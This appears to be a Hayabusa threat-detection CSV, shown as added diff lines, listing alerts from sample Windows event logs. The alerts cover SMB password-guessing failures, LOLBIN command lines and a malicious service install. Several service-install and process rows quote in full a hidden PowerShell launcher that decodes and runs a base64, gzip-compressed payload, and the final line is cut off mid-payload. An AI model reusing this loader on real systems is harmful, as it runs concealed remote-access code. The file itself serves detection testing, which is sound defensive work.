+2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2V